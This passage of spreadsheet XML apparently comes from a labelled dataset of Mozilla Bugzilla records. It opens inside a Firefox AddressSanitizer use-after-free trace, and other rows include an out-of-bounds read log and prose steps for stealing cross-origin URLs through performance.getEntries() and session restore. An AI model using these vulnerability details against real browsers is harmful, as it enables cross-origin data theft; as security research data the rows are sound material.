    #12 0x7f76beb1aa96 in FlushPendingNotifications /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:4000:3
    #13 0x7f76beb1aa96 in HandlePostedReflowCallbacks /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:3968
    #14 0x7f76beb1aa96 in PresShell::DidDoReflow(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:9425
    #15 0x7f76beb2cfca in PresShell::ProcessReflowCommands(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:9787:7
    #16 0x7f76beb2bf37 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:4147:11
    #17 0x7f76be8511d1 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsRefreshDriver.cpp:1797:9
    #18 0x7f76be85d2cc in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsRefreshDriver.cpp:251:7
    #19 0x7f76be85cf99 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsRefreshDriver.cpp:270:5
    #20 0x7f76be85ea14 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsRefreshDriver.cpp:430:9
    #21 0x7f76bf19f314 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/ipc/VsyncChild.cpp:64:5
    #22 0x7f76b8dd2e9a in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:240:20
    #23 0x7f76b88bdeed in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:2133:16
    #24 0x7f76b8803747 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessageChannel.cpp:1658:14
    #25 0x7f76b8800586 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessageChannel.cpp:1596:17
    #26 0x7f76b87ee357 in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessageChannel.cpp:1563:5
    #27 0x7f76b881dc62 in applyImpl&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:729:12
    #28 0x7f76b881dc62 in apply&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:735
    #29 0x7f76b881dc62 in mozilla::detail::RunnableMethodImpl&lt;bool (mozilla::ipc::MessageChannel::*)(), false, true&gt;::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:764
    #30 0x7f76b881d24f in Run /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:476:22
    #31 0x7f76b881d24f in mozilla::ipc::MessageChannel::DequeueTask::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:495
    #32 0x7f76b7a45996 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1073:7
    #33 0x7f76b7ac3d3c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #34 0x7f76b880aa1f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #35 0x7f76b877f2e8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:235:3
    #36 0x7f76b877f2e8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #37 0x7f76b877f2e8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #38 0x7f76be1d287f in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #39 0x7f76c02588a7 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:837:12
    #40 0x7f76b877f2e8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:235:3
    #41 0x7f76b877f2e8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #42 0x7f76b877f2e8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #43 0x7f76c0257f43 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:667:7
    #44 0x4e2c05 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:224:19
    #45 0x7f76b4af082f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #46 0x41e7b8 in _start (/home/nils/fuzzer3/firefox/plugin-container+0x41e7b8)
0x60b00013aad0 is located 0 bytes inside of 104-byte region [0x60b00013aad0,0x60b00013ab38)
freed by thread T0 (Web Content) here:
    #0 0x4b4f0b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f76b79246d4 in SnowWhiteKiller::~SnowWhiteKiller() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/base/nsCycleCollector.cpp:2685:9
    #2 0x7f76b79242c6 in nsCycleCollector::FreeSnowWhite(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/base/nsCycleCollector.cpp:2859:3
    #3 0x7f76b93d002e in AsyncFreeSnowWhite::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/xpconnect/src/XPCJSRuntime.cpp:142:34
    #4 0x7f76b7a45996 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1073:7
    #5 0x7f76b7ac3d3c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #6 0x7f76b880aa1f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #7 0x7f76b877f2e8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:235:3
    #8 0x7f76b877f2e8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #9 0x7f76b877f2e8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #10 0x7f76be1d287f in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #11 0x7f76c02588a7 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:837:12
    #12 0x7f76b877f2e8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:235:3
    #13 0x7f76b877f2e8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #14 0x7f76b877f2e8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #15 0x7f76c0257f43 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:667:7
    #16 0x4e2c05 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:224:19
    #17 0x7f76b4af082f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
previously allocated by thread T0 (Web Content) here:
    #0 0x4b522b in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e2efd in moz_xmalloc /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f76befe5036 in operator new /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:193:12
    #3 0x7f76befe5036 in nsSVGFilterChainObserver::nsSVGFilterChainObserver(nsTArray&lt;nsStyleFilter&gt; const&amp;, nsIContent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/svg/nsSVGEffects.cpp:283
    #4 0x7f76bc6399b0 in CanvasFilterChainObserver /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/canvas/CanvasRenderingContext2D.cpp:946:7
    #5 0x7f76bc6399b0 in mozilla::dom::CanvasRenderingContext2D::SetFilter(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/canvas/CanvasRenderingContext2D.cpp:2614
    #6 0x7f76bb79e899 in mozilla::dom::CanvasRenderingContext2DBinding::set_filter(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::CanvasRenderingContext2D*, JSJitSetterCallArgs) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3049:3
    #7 0x7f76bc56c3ee in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/bindings/BindingUtils.cpp:2752:8
    #8 0x7f76c244c6db in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:232:15
    #9 0x7f76c244c6db in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:441
    #10 0x7f76c244e828 in InternalCall /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:498:12
    #11 0x7f76c244e828 in Call /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:517
    #12 0x7f76c244e828 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:644
    #13 0x7f76c24bbc4f in SetExistingProperty /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/NativeObject.cpp:2364:10
    #14 0x7f76c24bbc4f in js::NativeSetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::QualifiedBool, JS::ObjectOpResult&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/NativeObject.cpp:2399
    #15 0x7f76c242cd45 in SetProperty /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/NativeObject.h:1495:12
    #16 0x7f76c242cd45 in SetPropertyOperation /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:256
    #17 0x7f76c242cd45 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2666
    #18 0x7f76c241a03b in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:399:12
    #19 0x7f76c244cd80 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:471:15
    #20 0x7f76c244d3f1 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:517:10
    #21 0x7f76c1f91898 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:2839:12
    #22 0x7f76bc081540 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #23 0x7f76bc9b797b in Call&lt;nsISupports *&gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #24 0x7f76bc9b797b in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/JSEventHandler.cpp:214
    #25 0x7f76bc984b6f in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/EventListenerManager.cpp:1116:16
    #26 0x7f76bc9866ed in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/EventListenerManager.cpp:1288:17
    #27 0x7f76bc96210c in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/EventDispatcher.cpp:379:5
    #28 0x7f76bc966470 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/EventDispatcher.cpp:710:9
    #29 0x7f76bea84d65 in nsDocumentViewer::LoadComplete(nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsDocumentViewer.cpp:996:7
    #30 0x7f76bf7e5cd1 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:7577:5
    #31 0x7f76bf7e1d01 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:7378:7
    #32 0x7f76bf7e8f7f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:7275:13
    #33 0x7f76b983cba1 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:1252:3
    #34 0x7f76b983bc54 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:836:5
    #35 0x7f76b9838adc in nsDocLoader::DocLoaderIsEmpty(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:726:9
    #36 0x7f76b983abb4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:608:5
    #37 0x7f76b983b6ac in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:464:14
    #38 0x7f76b7c1879b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/base/nsLoadGroup.cpp:633:18
SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsNodeUtils.cpp:177:3 in nsNodeUtils::NativeAnonymousChildListChange(nsIContent*, bool)
Shadow bytes around the buggy address:
  0x0c168001f500: fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c168001f510: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c168001f520: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fd fd
  0x0c168001f530: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c168001f540: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c168001f550: fd fd fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd
  0x0c168001f560: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c168001f570: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c168001f580: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd
  0x0c168001f590: fd fd fd fd fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c168001f5a0: fd fd fd fd fd fd fd fd fd fd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4981==ABORTING</t>
        </is>
      </c>
      <c r="X2809" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2810">
      <c r="A2810" t="n">
        <v>1246956</v>
      </c>
      <c r="B2810" t="inlineStr">
        <is>
          <t>2016-02-09 07:44:50 -0800</t>
        </is>
      </c>
      <c r="C2810" t="inlineStr">
        <is>
          <t>Stealing of URL cross-domain using performance.getEntries() after restore previous session</t>
        </is>
      </c>
      <c r="D2810" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:18 -0700</t>
        </is>
      </c>
      <c r="E2810" t="n">
        <v>1</v>
      </c>
      <c r="F2810" t="n">
        <v>1</v>
      </c>
      <c r="G2810" t="n">
        <v>2</v>
      </c>
      <c r="H2810" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2810" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2810" t="inlineStr">
        <is>
          <t>Session Restore</t>
        </is>
      </c>
      <c r="K2810" t="inlineStr">
        <is>
          <t>44 Branch</t>
        </is>
      </c>
      <c r="L2810" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2810" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2810" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2810" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2810" t="inlineStr">
        <is>
          <t>[adv-main45+][post-critsmash-triage][adv-esr38.8+]</t>
        </is>
      </c>
      <c r="Q2810" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2810" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2810" t="inlineStr">
        <is>
          <t>Firefox 47</t>
        </is>
      </c>
      <c r="T2810" t="n">
        <v>1</v>
      </c>
      <c r="U2810" t="n">
        <v>0</v>
      </c>
      <c r="V2810" t="n">
        <v>88</v>
      </c>
      <c r="W2810" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) Gecko/20100101 Firefox/44.0
Build ID: 20160123151951
Steps to reproduce:
It is possible to read cross-origin URLs following a redirect if perfomance.getEntries() is used along with an iframe to host a page after a first loading of this malicious webpage and the closing of Firefox (*) and restored the previous session. 
using the JavaScript function "history.back()" , the closing of Firefox and restored the previous session, content is pulled from the browser cache for the redirected location instead of going to the original location. 
* ( A Crash bug can be used to force Firefox to close without user interaction )
(I will upload a demonstration video to show you that)
Actual results:
Cross Origin URLs is stolen , this is a same-origin policy violation and could allow for data theft.
Expected results:
The stealing of a Cross Origin URL shouldn't be possible normally but this vulnerability demonstrates that it is posssible using these steps.</t>
        </is>
      </c>
      <c r="X2810" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2811">
      <c r="A2811" t="n">
        <v>1126970</v>
      </c>
      <c r="B2811" t="inlineStr">
        <is>
          <t>2015-01-28 11:43:54 -0800</t>
        </is>
      </c>
      <c r="C2811" t="inlineStr">
        <is>
          <t>Test load postgres in Heroku Postgres</t>
        </is>
      </c>
      <c r="D2811" t="inlineStr">
        <is>
          <t>2015-03-04 07:22:47 -0800</t>
        </is>
      </c>
      <c r="E2811" t="n">
        <v>1</v>
      </c>
      <c r="F2811" t="n">
        <v>1</v>
      </c>
      <c r="G2811" t="n">
        <v>4</v>
      </c>
      <c r="H2811" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2811" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2811" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K2811" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2811" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2811" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2811" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2811" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2811" t="inlineStr"/>
      <c r="Q2811" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2811" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2811" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2811" t="n">
        <v>1</v>
      </c>
      <c r="U2811" t="n">
        <v>0</v>
      </c>
      <c r="V2811" t="n">
        <v>5</v>
      </c>
      <c r="W2811" t="inlineStr">
        <is>
          <t>Making a minimal database for testing stage crashes pushed into Heroku Postgres and loading into Heroku</t>
        </is>
      </c>
      <c r="X2811" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2812">
      <c r="A2812" t="n">
        <v>1122218</v>
      </c>
      <c r="B2812" t="inlineStr">
        <is>
          <t>2015-01-15 12:45:58 -0800</t>
        </is>
      </c>
      <c r="C2812" t="inlineStr">
        <is>
          <t>Out-of-Bounds Read in AudioParamTimeline::AudioNodeInputValue</t>
        </is>
      </c>
      <c r="D2812" t="inlineStr">
        <is>
          <t>2016-07-02 10:44:45 -0700</t>
        </is>
      </c>
      <c r="E2812" t="n">
        <v>1</v>
      </c>
      <c r="F2812" t="n">
        <v>1</v>
      </c>
      <c r="G2812" t="n">
        <v>3</v>
      </c>
      <c r="H2812" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2812" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2812" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K2812" t="inlineStr">
        <is>
          <t>37 Branch</t>
        </is>
      </c>
      <c r="L2812" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2812" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2812" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2812" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2812" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q2812" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2812" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2812" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T2812" t="n">
        <v>0</v>
      </c>
      <c r="U2812" t="n">
        <v>0</v>
      </c>
      <c r="V2812" t="n">
        <v>20</v>
      </c>
      <c r="W2812" t="inlineStr">
        <is>
          <t>Created attachment 8549853
testcase.html
The asan report was generated with this build: 
https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1421077535/firefox-37.0a1.en-US.linux-x86_64-asan.tar.bz2
Asan Log:
==32128==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6160008fd890 at pc 0x7f298eb25e71 bp 0x7f2934856310 sp 0x7f2934856308
READ of size 4 at 0x6160008fd890 thread T69 (threaded-ml)
    #0 0x7f298eb25e70 in AudioNodeInputValue /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/media/webaudio/AudioParam.cpp:139
    #1 0x7f298eb6a48c in GetValueAtTime&lt;long&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/media/webaudio/AudioParamTimeline.h:93
    #2 0x7f298eb69c53 in ComputeCustom /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/media/webaudio/OscillatorNode.cpp:243
    #3 0x7f298eb232df in ProcessInput /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/media/webaudio/AudioNodeStream.cpp:492
    #4 0x7f298e9b4016 in ProduceDataForStreamsBlockByBlock /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/media/MediaStreamGraph.cpp:1229
...</t>
        </is>
      </c>
      <c r="X2812" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2813">
      <c r="A2813" t="n">
        <v>1220493</v>
      </c>
      <c r="B2813" t="inlineStr">
        <is>
          <t>2015-11-01 14:55:49 -0800</t>
        </is>
      </c>
      <c r="C2813" t="inlineStr">
        <is>
          <t>Underflow in RTPReceiverVideo::ParseRtpPacket causes memory-safety bug and information leak</t>
        </is>
      </c>
      <c r="D2813" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:48 -0700</t>
        </is>
      </c>
      <c r="E2813" t="n">
        <v>1</v>
      </c>
      <c r="F2813" t="n">
        <v>1</v>
      </c>
      <c r="G2813" t="n">
        <v>3</v>
      </c>
      <c r="H2813" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2813" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2813" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K2813" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L2813" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2813" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2813" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2813" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2813" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main43+][adv-esr38.5+]</t>
        </is>
      </c>
      <c r="Q2813" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2813" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2813" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T2813" t="n">
        <v>1</v>
      </c>
      <c r="U2813" t="n">
        <v>0</v>
      </c>
      <c r="V2813" t="n">
        <v>21</v>
      </c>
